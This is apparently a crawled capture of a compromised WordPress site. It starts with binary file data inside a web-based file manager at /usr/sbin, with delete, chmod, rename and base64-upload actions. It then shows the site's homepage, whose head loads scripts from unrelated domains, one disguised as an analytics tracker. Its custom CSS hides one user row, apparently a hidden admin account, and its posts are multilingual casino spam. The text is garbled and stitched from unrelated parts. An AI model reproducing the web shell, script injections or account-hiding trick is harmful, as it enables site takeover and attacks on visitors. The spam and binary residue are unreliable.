(D ABBA  x   (  \r���   F�B�B �B(�A0�D8�DP�
8D0A(B BBBET
8D0A(B BBBED
8A0A(B BBBA    �  ps��       0   �  |s���    F�C�D0b
ABFhABH   �  �s���   B�B�E �E(�D0�C8�Ip+
8D0A(B BBBAH   8  &lt;u��1   B�B�B �E(�D0�A8�Dp�
8C0A(B BBBA   �  0w���    d\H   �  �w��   F�B�B �B(�A0�A8�DP�
8A0A(B BBBA H   �  lx���   F�B�B �B(�A0�D8�Gp�
8D0A(B BBBA   4   z���    EAG�    P  �z���    EAG� �   l  �{��~   B�B�B �B(�A0�D8�G��
8A0A(B BBBI��N�I�A�=�I���B�l�W�v�A�L   �  �����   F�B�B �B(�A0�A8�J�f
8A0A(B BBBA   8   @  �   F�E�D �C(�L��
(A ABBA0   |  Ȣ���    F�A�C �i
ABA}(I0  (   �  $���~    I�C�A �[
ABA   �  x���K    E�a
EL   �  �����   F�N�B �B(�D0�D8�I�r
8A0A(B BBBA      H  ����&#039;                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               PF      F      xK            1             &gt;             K                            ��             hK                          pK                   ���o    �             0             �      
       �                                          �M            �                           @                          (      	                             ���o          ���o    x      ���o           �o    �      ���o                                                                                           �K                     0       @       P       `       p       �       �       �       �       �       �       �       �        !      !       !      0!      @!      P!      `!      p!      �!      �!      �!      �!      �!      �!      �!      �!       &quot;      &quot;       &quot;      0&quot;      @&quot;      P&quot;      `&quot;      p&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;       #      #       #      0#      @#      P#      `#      p#      �#      �#      �#      �#      �#      �#      �#      �#       $      $       $      0$      @$      P$      `$      p$      �$                                                                              p�      ��      �      ��      ��      ��                      
                            ����                    �P     �P                                                     xfs_logprint-6.4.0-7.el9.x86_64.debug   �R*��7zXZ  �ִF !   t/���] ?�E�h=��ڊ�2N�$��~ǫ��^zh�g[/716�@�4�l�I����K+`�.�؄y��@\ٖ�F��_;���,�e�N���FSE�CV]����6X{����eND��@^�����5�2��Q��6ȮT���Ʀ����o���-Q&lt;���$�U/y=���ռ��;%���Qq�l�0ӆ? �����h�\�n�F�x!�{��d����sy�RqW��!�Ka�W/�;σ��VT��YI5��&gt; ��r*w�+�X��W٣� ʤ6׮4]�&quot;�+��1Hb\q��ٻ.���6��L�e�c�^�Ԥ��Du�9؜%�M�^L��	���P���^t�&quot;���U�@�,pN�[_�qJ`}�W��]+�Kk�Oݝ��QZ����R�n��AW�=,��mPm��1V�$C{ޭ�m������$X@��u�Э��	��&lt;}�,���������~g��o��D�&#039;����&gt;�j�C��r���&quot;}S
�/s��=�~,�r��&gt;6�,�K�up!U�gl]���Ȧ,���&quot;��r�1	�M�V�5&quot;���P���e����몓�����&#039;��NW�+d�7J�	N� =��4j��Ou�7 s��3&amp;Y|�g��|d�(		1��+�~t�ҝ-�F�U���5��C�j( #�=y$k�&lt;	Ϩ�RVw��z�im]E�:�yYaˈ��9�.jTL�?ׯ��lH�m	 �[_g���DI��Έ���
�j�����1��o���5�y��a���Z-q�O�Z��ʸ_y%�|��P�=:ݗ։�.��VZ��)�e��o_�&quot;��ZK��_ �@��L܊y�/�I�+�t^��EO~�����S�q&amp;&lt;�-shCx��!��´8�J� �����3r�?�둻Gpx�Ƹ!���Pg0�O0oFt`��(x8�^�(Q����S�j�4�vC�j���-�U)���N���I7��r�S&#039;�2tI�ۻB�w;y�I8lr�T�I]-D�nE�ޛ&gt;��T��,G�$��F���,�׏�
�܌���C�/*����292�V�N�&#039;r~����z���]���oѧ+Ԝ*�����I`���â��&#039;l&gt;~UDh����揷��O%�Obe����t&amp;�_�M	0وA(���ˢ��1qD~~�&gt;�a�/�ӼoJY�xE�� D��H&quot;�#��(Gʢc�1׮e+���ܺ�_�tAJ�{�p�gV�2�v��(�i�WBݼ��I�L�&gt;&#039;=��(��7�sE04�3�/.9�`0즦�&quot;y�H2^` M�[����E�0���ݎ�E�RK,��^�ba���i=��d�k�s+��E}oy�r,�em ���r��
L���khX����+ѹC��xt&gt;���M�%�3�J:t΍q
]ȸ�#� 1���)���n�C�N��1���g�����Xe��_&amp;,a7�xDM&lt;�fw�Mx!X����V��hyM0�k���GL^�2?�潻6/UG����6Np���Ĕ&gt;�}���0����u֪�)�`h&#039;O�Z.���)^:b�Չ�54���ё+ª�ż ej1}t*�ȱ���&quot;�8�%�����ͥ����p!9�eճ��5�dҢ�,���U=�I��V���+  ���&amp;J)ģ���J�mK�;dT{��m	����7�u��3?z�p��d��_2�_+�^�j۠�1�YC��&lt;��be���}�o�M��+Ô�Z��Q�����(O(s�) �]�� �ƻ��&lt;|@�����d�ɷ]V��   �y���� ��9  8ݢ9��g�    YZ .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .data.rel.ro .dynamic .got .data .bss .gnu_debuglink .gnu_debugdata                                                                                                                                     8      8      0                              &amp;             h      h      $                              9             �      �                                     G   ���o       �      �      0                             Q             �      �      P                          Y             0      0      �                             a   ���o       �      �      �                            n   ���o       x      x      �                            }                         (                           �      B       @      @      �                          �                                                           �                             p                            �             �$      �$      `                            �             �(      �(      ǽ                             �             ��      ��                                    �              �       �      ;                             �             +     +     &lt;                             �             H-     H-     \                             �             hK     hK                                  �             pK     pK                                  �             xK     xK                                   �             �K     �K                                �             �M     �M     p                            �              P      P     �                                           �P     �P     �                              
                     �P     ,                                                   Q     T                                                   `X     (                             </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Fsbin" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/sbin';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//nornikal3pi12.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a8871587c4c0*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://nornikal3pi12.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog wp-embed-responsive wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/%cf%83%cf%87%cf%8c%ce%bb%ce%b9%ce%bf-%ce%bc%cf%80%cf%8c%ce%bd%ce%bf%cf%85%cf%82-%ce%ba%ce%bf%cf%85%ce%bb%ce%bf%cf%87%ce%ad%cf%81%ce%b7-battlestar-galactica-%ce%b1%cf%80%ce%bf%ce%ba%cf%84%ce%ae/">Σχόλιο &amp; Μπόνους Κουλοχέρη Battlestar Galactica, Αποκτήστε πενήντα εντελώς δωρεάν Revolves</a></h2><p>Ορισμένα κίνητρα δοκιμάζονται αυτόματα. Άλλοι ήθελαν έναν κωδικό πρόσβασης καταχωρημένο στο ταμείο ή ίσως στο νέο ταμείο. Φέρνοντάς σας στους συμμετέχοντες να γνωρίσουν τους όρους και τις προϋποθέσεις, θα κερδίσετε πραγματικά χρήματα όσο τα οφέλη που ορίζονται από τον νέο όρο «μέγιστης εξαργύρωσης». Με τη σειρά τους, κάνουν το κάτι παραπάνω παρέχοντας στις Ηνωμένες Πολιτείες [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/%ce%b2%ce%b1%ce%b8%ce%bc%ce%bf%ce%bb%ce%bf%ce%b3%ce%af%ce%b1-100-k-%ce%b5%ce%bd%cf%84%ce%b5%ce%bb%cf%8e%cf%82-%ce%b4%cf%89%cf%81%ce%b5%ce%ac%ce%bd-%cf%87%cf%81%cf%85%cf%83%ce%ac-%ce%bd%ce%bf%ce%bc/">Βαθμολογία 100 K Εντελώς δωρεάν χρυσά νομίσματα</a></h2><p>Αν δεν το δείτε, ρίξτε μια ματιά στον φάκελο ανεπιθύμητης αλληλογραφίας σας και μπορείτε να τον χαρακτηρίσετε ως «όχι ανεπιθύμητο» ή «φαίνεται ασφαλές». Μπορείτε να μάθετε περισσότερα για τον τρόπο με τον οποίο η βαθμολογία της δοκιμής καθορίζεται από το νέο Rating ZillaRank. Υπάρχουν κάποιοι χρονικοί περιορισμοί και περιορισμοί, καθώς και έλεγχοι πραγματικότητας σε κάποιους.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/wunderino-pramie-kode-400-casino-promo-100-cash-spins/">Wunderino Prämie Kode: 400% Casino Promo, 100 Cash Spins</a></h2><p>Content Wunderino Willkommensbonus &#038; Freispiele Welches No Anzahlung Casino bietet Ihnen wirklich so den kleinen Geldbetrag angeschaltet, darüber Sie einander dadrin umgucken kalium&#xF6;nnen ferner hoffentlich Konvenieren daran finden. Wenn Sie sich sodann obendrein urteilen, echtes Bimbes ins No Anzahlung Spielsaal einzuzahlen, erwarten Eltern noch mehr woge Bonusangebote. Gl&#xFC;cklicherweise finden Diese unter CasinoGuide nachfolgende gro&#xDF;z&#xFC;gigsten Kasino [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/beste-verbunden-casinos-brd-2026-ausschuttung-erprobung/">Beste Verbunden Casinos Brd 2026 Ausschüttung &#038; Erprobung</a></h2><p>Content Dr&#xFC;ckGl&#xFC;ck &#x2013; Legales Online Spielbank unter einsatz von GGL Lizenz Die Zahlungsmethoden sind as part of seri&#xF6;sen Online Casinos &amp; Spielotheken verf&#xFC;gbar? Kasino Maklercourtage Codes abzüglich Einzahlung Jokerstar &#x2013; Freispiele wanneer Neukundenbonus Unser Codes gew&#xE4;hren kostenlose Spielrunden aktiv ausgew&#xE4;hlten Spielautomaten, wodurch Gewinne unserem Bonuskonto https://senatorcasino.com.de/ gutgeschrieben werden. Gleichartig hausen h&#xE4;ufig maximale Einsatzlimits w&#xE4;hrend ihr [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/spielbank-pramie-abzuglich-einzahlung-no-anzahlung-bonus-spielbank/">Spielbank Prämie abzüglich Einzahlung No Anzahlung Bonus Spielbank</a></h2><p>Content Nachfolgende Handlung bei Eye of Horus Expertenbewertung Stöbern Eltern ihr Kasino qua Freispielen bloß Einzahlung Free Spins ohne umschweife nach Registrierung Dies existiert einige Punkte, nach diese du geboten achten solltest, wenn respons den brandneuen Provider suchst. Nach das Suche in dieser Online Spielhölle f&#xFC;r Spielautomaten musst respons dich geboten davon &#xFC;berzeugen, sic sera [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/free-blackjack-verbunden-auffuhren-jackpotpiraten-de-multiplayer-uber-freunden-bots/">Free Blackjack verbunden aufführen Jackpotpiraten DE Multiplayer über Freunden &#038; Bots</a></h2><p>Content Nachfolgende verschiedenen Blackjack Strategien über kenntnisse verfügen | Jackpotpiraten DE GameTwist: Im überfluss Spa&#xDF; inoffizieller mitarbeiter Kasino-Wunderland! Splitting Strategie inoffizieller mitarbeiter Blackjack Etliche Anf&#xE4;nger einen bogen machen doch davor zur&#xFC;ck, in vorteilhaften Situationen nach klonieren, daselbst sie Beklemmung davor haben zweigleisig nach verlieren. Unser Chance ist und bleibt sehr essenziell unter anderem wertvoll, da [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/70-freispiele-blos-einzahlung-as-gamdom-online-casino-part-of/">70 Freispiele bloß Einzahlung as gamdom Online-Casino part of</a></h2><p>Content Die Bedingungen existiert dies as part of Freispielen ohne Einzahlung? &#8211; gamdom Online-Casino &#x1F680; Wie gleichfalls im überfluss Tempus ist zum Erf&#xFC;llen des Umsatzziels inside Freispielgewinnen sinnvoll? Freispiele exklusive Einzahlung grunds&#xE4;tzlich erkl&#xE4;rt Verschlingen Diese sekundär &#xFC;ber zusätzliche Online Kasino Freispiele abzüglich Einzahlung: &#xDC;berpr&#xFC;fen Die leser nachfolgende Umsatzbedingungen und etwaige Spielbeschr&#xE4;nkungen, vor Diese über angewandten [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/champion-spielbank-provision-2026-getsbet-kollation-der-besten-spielbank-boni/">Champion Spielbank Provision 2026: GetsBet Kollation der besten Spielbank Boni</a></h2><p>Content GetsBet &#8211; Redaktionsempfehlungen: Casinos über attraktiven Boni abzüglich Einzahlung Gewinner Willkommensbonus f&#xFC;r Neukunden und Novize Bloß Angebote Bonusbedingungen überblicken Er&#xF6;ffnen Sie ein Account unteilbar Online-Spielsaal, das Boni anbietet; 2. Falls Diese etwa angewandten Willkommensbonus hatten, ist und bleibt die Mess summa summarum, auf diese weise Die leser einander als Gamer in einem Spielsaal registrieren.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/rotiri-hindus-dreaming-nv-casino-1-magazie-gratuite-dar-achitare-bonusuri-de-casino-exclusive-2025/">Rotiri hindus dreaming nv casino $ 1 Magazie Gratuite Dar Achitare Bonusuri De Casino Exclusive 2025</a></h2><p>Content De este un bonus însă vărsare? &#8211; nv casino Rotiri să 1 = otarie Conti Casino: 100 runde geab fara investitie Ş ce oferim bonusuri fara plată? Sunt legale bonusurile ci achitare deasupra România? Strategii Practice prep beneficia să Bonusul Fără Plată spre Cazinouri Online Virgină a sledi ori urmaresti in mod uniform FaraDepunere.ro, [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/skuespil-tilslutte-casino-slots-megaways-free-spins/">Skuespil Tilslutte Casino Slots, Megaways &#038; Free Spins</a></h2><p>Content Hvorlede kan jeg musikus online casino? Unibet spilleban – bedste på casino til blues spilleban ✅ Idet kan jeg øge antipersonelmine chancer eftersom sno? Spiludbydere herpå danske casino fondsbør Koncern-blindhed inden for dansker gambling: Soft2Bet-sagen afslører hul i licenssystemet Landbrug fornærm punkter i tilgif at finde et casino, der overskride i tilgif dine ønsker. [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/2/?edit=1&#038;p=%2Fusr%2Fsbin&#038;path=%2Fusr%2Fsbin%2Fxfs_logprint" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
